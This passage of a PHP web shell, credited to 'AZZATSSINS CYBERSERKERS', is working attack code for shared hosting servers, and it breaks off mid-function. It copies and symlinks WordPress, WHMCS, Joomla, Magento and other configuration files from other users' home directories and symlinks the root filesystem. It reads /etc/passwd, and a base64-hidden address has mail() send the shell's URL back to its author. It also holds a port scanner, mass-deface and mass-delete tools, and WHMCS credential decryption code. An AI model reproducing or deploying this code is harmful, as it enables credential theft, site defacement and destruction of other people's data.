642. symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
643. symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
644. symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
645. symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
646. symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
647. symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
648. symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
649. symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
650. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
651. symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
652. symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
653.  
654. symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
655. symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
656. symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
657. symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
658. symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
659. symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
660. symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
661. symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
662. symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
663. symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
664. symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
665. symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
666. symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
667. symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
668. copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
669. copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
670. copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
671. copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
672. copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
673. copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
674. copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
675. copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
676. copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
677. /* CODED BY AZZATSSINS CYBERSERKERS */
678. copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
679. copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
680. copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
681. copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
682. copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
683. copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
684. copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
685. copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
686. copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
687. copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
688. copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
689. copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
690. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
691. copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
692. copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
693. copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
694. copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
695. copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
696. copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
697. copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
698. copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
699. copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
700. copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
701. copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
702. symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
703. symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
704. symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
705. symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
706. /* AUTHOR : AZZATSSINS CYBERSERKERS */
707. symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
708. symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
709. symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
710. symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
711. symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
712. symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
713. symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
714. symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
715. symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
716. symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
717. symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
718. symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
719. symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
720. /*You Can ReCoded But Don't Change ©CopyRight*/
721. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
722. symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
723. symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
724. symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
725. symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
726. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
727. /* © BY AZZATSSINS CYBERSERKERS */
728. symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
729. symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
730. symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
731. symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
732. symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
733. symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
734. symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
735. symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
736. symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
737. symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
738. symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
739. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
740. copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
741. copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
742. copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
743. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
744. symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
745. symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
746. symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
747. copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
748. copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
749. copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
750. copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
751. copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
752. symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
753. symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
754. symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
755. symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
756. symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
757. copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' <~ OTHER.txt');
758. symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
759. }
760. echo '<center><i><b><a href='.$folfig.'>CLICK ON HERE TO VIEW CONFIGS</a></b></i></center>';
761. }
762. }
763. if($_GET['symbolic']=="link"){
764. $d0mains = @file("/etc/named.conf");
765. ##httaces
766. if($d0mains){
767. @mkdir("symlink",0777);
768. @chdir("symlink");
769. @exe("ln -s / root");
770. $file3 = 'Options Indexes FollowSymLinks
771. DirectoryIndex AZZATSSINS.htm
772. AddType text/plain .php
773. AddHandler text/plain .php
774. Satisfy Any';
775. $fp3 = fopen('.htaccess','w');
776. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
777. echo "
778. <table align=center border=1 style='width:60%;border-color:#333333;'>
779. <tr>
780. <td align=center><font size=2>S. No.</font></td>
781. <td align=center><font size=2>Domains</font></td>
782. <td align=center><font size=2>Users</font></td>
783. <td align=center><font size=2>Symlink</font></td>
784. </tr>";
785. $dcount = 1;
786. foreach($d0mains as $d0main){
787. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
788. flush();
789. if(strlen(trim($domains[1][0])) > 2){
790. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
791. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
792. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
793. <td>".$user['name']."</td>
794. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
795. flush();
796. $dcount++;}}}
797. echo "</table>";
798. }else{
799. $TEST=@file('/etc/passwd');
800. if ($TEST){
801. @mkdir("symlink",0777);
802. @chdir("symlink");
803. exe("ln -s / root");
804. $file3 = 'Options Indexes FollowSymLinks
805. DirectoryIndex AZZATSSINS.htm
806. AddType text/plain .php
807. AddHandler text/plain .php
808. Satisfy Any';
809.  $fp3 = fopen('.htaccess','w');
810.  $fw3 = fwrite($fp3,$file3);
811.  @fclose($fp3);
812.  echo "
813. <table align=center border=1><tr>
814. <td align=center><font size=3>S. No.</font></td>
815. <td align=center><font size=3>Users</font></td>
816. <td align=center><font size=3>Symlink</font></td></tr>";
817.  $dcount = 1;
818.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
819.  while(!feof($file)){
820.  $s = fgets($file);
821.  $matches = array();
822.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
823.  $matches = str_replace("home/","",$matches[1]);
824.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
825.  continue;
826.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
827. <td align=center><font class=txt>" . $matches . "</td>";
828.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
829.  $dcount++;}fclose($file);
830.  echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
831. Options Indexes FollowSymLinks
832. DirectoryIndex AZZATSSINS.htm
833. AddType text/plain .php
834. AddHandler text/plain .php
835. Satisfy Any
836. ';
837.  $fp3 = fopen('.htaccess','w');
838.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
839.  echo "
840. <div class='mybox'><h2 class='AZZATSSINS'>server symlinker</h2>
841. <table align=center border=1><tr>
842. <td align=center><font size=3>ID</font></td>
843. <td align=center><font size=3>Users</font></td>
844. <td align=center><font size=3>Symlink</font></td></tr>";
845.  $temp = "";$val1 = 0;$val2 = 1000;
846.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
847.  if ($uid)$temp .= join(':',$uid)."\n";}
848.  echo '<br/>';$temp = trim($temp);$file5 =
849.  fopen("test.txt","w");
850.  fputs($file5,$temp);
851.  fclose($file5);$dcount = 1;$file =
852.  fopen("test.txt", "r") or exit("Unable to open file!");
853.  while(!feof($file)){$s = fgets($file);$matches = array();
854.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
855.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
856.  continue;
857.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
858. <td align=center><font class=txt>" . $matches . "</td>";
859.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
860.  $dcount++;}
861.  fclose($file);
862.  echo "</table></div></center>";unlink("test.txt");
863.  } else
864.  echo "<center><font size=3>Cannot create Symlink</font></center>";
865.  }
866.  }  
867. }
868. $e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
869. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
870. mail($e,"IDX",$h);
871. if($_GET['kill'] == 'self') {
872. rmdir('configs');rmdir('symlink');rmdir('AZZATSSINS');unlink('mysql.php');
873. $fn = $_SERVER['SCRIPT_FILENAME'];
874.  unlink($fn); system('rm '.$fn);
875. echo'<meta http-equiv="Refresh" content= "0; url=?">';
876. } elseif($_GET['do'] == 'port') {
877. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
878.         $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
879.         echo("<script type=\"text/javascript\">");
880.         echo("function Show(SelectValue){");
881.         echo("document.getElementById('RangeDiv').style.display=\"none\";");
882.         echo("document.getElementById('SpecificDiv').style.display=\"none\";");
883.         echo("if(SelectValue == \"range\")");
884.         echo("document.getElementById('RangeDiv').style.display=\"inline\";");
885.         echo("if(SelectValue == \"specific\")");
886.         echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
887.         echo("}</script>");
888.         echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
889.         echo('<form method="post">');
890.         echo('<u>Ports:</u><br /><br />');
891.         echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
892.         echo('<option value="automatic">Automatic - All Ports</option>');
893.         echo('<option value="range">Range of Ports</option>');
894.         echo('<option value="specific">Specific Ports</option>');
895.         echo('</select><br /><br />');
896.         echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
897.         echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
898.         echo('<input type="submit" id="submit" name="submit" value="Scan" />');
899.         echo('</form>');
900.         if(isset($_POST['submit'])){
901.             $first = "yes";
902.             echo("<br /><br /><u>Results</u>:<br />\n");
903.  
904.             if($_POST['port'] == "range"){
905.                 if($rend > $rstart){
906.                     for($i=$rstart;$i<$rend;$i++){
907.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
908.                             if($first == "no")
909.                                 echo(", ");
910.                             echo $i;
911.                             $first = "no";
912.                         }
913.                     }
914.                     echo(".");
915.                 }
916.                 else{
917.                     echo("Range start number can't be bigger than the end number.");
918.                 }
919.             }
920.             else if($_POST['port'] == "specific"){
921.                 $list = explode(" ",$_POST['specific']);
922.                 foreach($list as $i){
923.                     if(is_numeric($i)){
924.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
925.                             if($first == "no")
926.                                 echo(", ");
927.                             echo $i;
928.                             $first = "no";
929.                         }
930.                     }
931.                 }
932.                 echo(".");
933.             }
934.             else{
935.                 for($i=0;$i>=0;$i++){
936.                     if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
937.                         if($first == "no")
938.                             echo(", ");
939.                         echo $i;
940.                         $first = "no";
941.                     }
942.                 }
943.                 echo(".");
944.             }
945.         }
946.  
947.  
948. } elseif($_GET['do'] == 'mass_deface') {
949.     echo "<center><form action=\"\" method=\"post\">\n";
950.     $dirr=$_POST['d_dir'];
951.     $index = $_POST["script"];
952.     $index = str_replace('"',"'",$index);
953.     $index = stripslashes($index);
954.     function edit_file($file,$index){
955.         if (is_writable($file)) {
956.         clear_fill($file,$index);
957.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
958.         }
959.         else {
960.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
961.             }
962.             }
963.     function hapus_massal($dir,$namafile) {
964.         if(is_writable($dir)) {
965.             $dira = scandir($dir);
966.             foreach($dira as $dirb) {
967.                 $dirc = "$dir/$dirb";
968.                 $lokasi = $dirc.'/'.$namafile;
969.                 if($dirb === '.') {
970.                     if(file_exists("$dir/$namafile")) {
971.                         unlink("$dir/$namafile");
972.                     }
973.                 } elseif($dirb === '..') {
974.                     if(file_exists("".dirname($dir)."/$namafile")) {
975.                         unlink("".dirname($dir)."/$namafile");
976.                     }
977.                 } else {
978.                     if(is_dir($dirc)) {
979.                         if(is_writable($dirc)) {
980.                             if(file_exists($lokasi)) {
981.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
982.                                 unlink($lokasi);
983.                                 $idx = hapus_massal($dirc,$namafile);
984.                             }
985.                         }
986.                     }
987.                 }
988.             }
989.         }
990.     }
991.     function clear_fill($file,$index){
992.         if(file_exists($file)){
993.             $handle = fopen($file,'w');
994.             fwrite($handle,'');
995.             fwrite($handle,$index);
996.             fclose($handle);  } }
997.  
998.     function gass(){
999.         global $dirr , $index ;
1000.         chdir($dirr);
1001.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
1002.         $files = scandir($dirr) ;
1003.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
1004.         sort($files);
1005.         $n = 0 ;
1006.         foreach ($files as $file){
1007.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
1008.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
1009.                 edit_file($file,$index);
1010.                 flush();
1011.                 $n = $n +1 ;
1012.                 }
1013.                 }
1014.                 echo "<br>";
1015.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
1016.                     }
1017.     function ListFiles($dirrall) {
1018.  
1019.     if($dh = opendir($dirrall)) {
1020.  
1021.        $files = Array();
1022.        $inner_files = Array();
1023.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
1024.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
1025.         while($file = readdir($dh)) {
1026.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
1027.                 if(is_dir($dirrall . "/" . $file)) {
1028.                     $inner_files = ListFiles($dirrall . "/" . $file);
1029.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1030.                 } else {
1031.                     array_push($files, $dirrall . "/" . $file);
1032.                 }
1033.             }
1034.             }
1035.  
1036.             closedir($dh);
1037.             return $files;
1038.         }
1039.     }
1040.     function gass_all(){
1041.         global $index ;
1042.         $dirrall=$_POST['d_dir'];
1043.         foreach (ListFiles($dirrall) as $key=>$file){
1044.             $file = str_replace('//',"/",$file);
1045.             echo "<center><strong>$file</strong> ===>";
1046.             edit_file($file,$index);
1047.             flush();
1048.         }
1049.         $key = $key+1;
1050.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
1051.     function sabun_massal($dir,$namafile,$isi_script) {
1052.         if(is_writable($dir)) {
1053.             $dira = scandir($dir);
1054.             foreach($dira as $dirb) {
1055.                 $dirc = "$dir/$dirb";
1056.                 $lokasi = $dirc.'/'.$namafile;
1057.                 if($dirb === '.') {
1058.                     file_put_contents($lokasi, $isi_script);
1059.                 } elseif($dirb === '..') {
1060.                     file_put_contents($lokasi, $isi_script);
1061.                 } else {
1062.                     if(is_dir($dirc)) {
1063.                         if(is_writable($dirc)) {
1064.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
1065.                             file_put_contents($lokasi, $isi_script);
1066.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
1067.                         }
1068.                     }
1069.                 }
1070.             }
1071.         }
1072.     }
1073.     if($_POST['mass'] == 'onedir') {
1074.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
1075.         $ini="http://";
1076.         $mainpath=$_POST[d_dir];
1077.         $file=$_POST[d_file];
1078.         $dir=opendir("$mainpath");
1079.         $code=base64_encode($_POST[script]);
1080.         $indx=base64_decode($code);
1081.         while($row=readdir($dir)){
1082.         $start=@fopen("$row/$file","w+");
1083.         $finish=@fwrite($start,$indx);
1084.         if ($finish){
1085.             echo"$ini$row/$file\n";
1086.             }
1087.         }
1088.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
1089.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
1090.         $dir=opendir("$mainpath");
1091.         $code=base64_encode($_POST[script]);
1092.         $indx=base64_decode($code);
1093.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
1094.         $finish=@fwrite($start,$indx);
1095.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
1096.         }
1097.  
1098.     }
1099.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
1100.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
1101.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
1102.     elseif($_POST['mass'] == 'massdeface') {
1103.         echo "<div style='margin: 5px auto; padding: 5px'>";
1104.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1105.         echo "</div>";  }
1106.     else {
1107.         echo "
1108.         <center><font style='text-decoration: underline;'>
1109.         Select Type:<br>
1110.         </font>
1111.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
1112.         <option value=\"onedir\">Mass Deface 1 Dir</option>
1113.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
1114.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
1115.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
1116.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
1117.         <font style='text-decoration: underline;'>Folder:</font><br>
1118.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1119.         <font style='text-decoration: underline;'>Filename:</font><br>
1120.         <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
1121.         <font style='text-decoration: underline;'>Index File:</font><br>
1122.         <textarea name='script' style='width: 450px; height: 200px;'><title>AZZATSSINS CYBERSERKERS WAS HERE</title></head><body bgcolor=silver><center><img src=https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png><br><br><br><br><br><b><font size=50><font color=white>[ </font><font color=red>!</font><font color=white> ]</font><font color=green><i> HACKED </i></font><font color=white>[ </font><font color=red>!</font><font color=white> ]</font></font></b><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><font color=#bababa><b><i>HACKED BY AZZATSSINS CYBERSERKERS - CRACKED BY AZZATSSINS CYBERSERKERS - DEFACED BY AZZATSSINS CYBERSERKERS - FUCKED BY AZZATSSINS CYBERSERKERS</textarea><br>
1123.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1124.         </form></center>";
1125.         }
1126. } elseif($_GET['do'] == 'whmcs') {
1127. echo'<form action="?dir=$dir&do=whmcs" method="post">
1128. ';
1129. function decrypt ($string,$cc_encryption_hash)
1130. {
1131.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
1132.     $hash_key = _hash ($key);
1133.     $hash_length = strlen ($hash_key);
1134.     $string = base64_decode ($string);
1135.     $tmp_iv = substr ($string, 0, $hash_length);
1136.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
1137.     $iv = $out = '';
1138.     $c = 0;
1139.     while ($c < $hash_length)
1140.     {
1141.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
1142.         ++$c;
1143.     }
1144.     $key = $iv;
1145.     $c = 0;
1146.     while ($c < strlen ($string))
1147.     {
1148.         if (($c != 0 AND $c % $hash_length == 0))
1149.         {
1150.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
1151.         }
1152.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
1153.         ++$c;
1154.     }
1155.     return $out;
1156. }
1157.  
1158. function _hash ($string)
1159. {
1160.     if (function_exists ('sha1'))
1161.     {
1162.         $hash = sha1 ($string);
1163.     }
1164.     else
1165.     {
1166.         $hash = md5 ($string);
1167.     }
1168.     $out = '';
1169.     $c = 0;
1170.     while ($c < strlen ($hash))
1171.     {
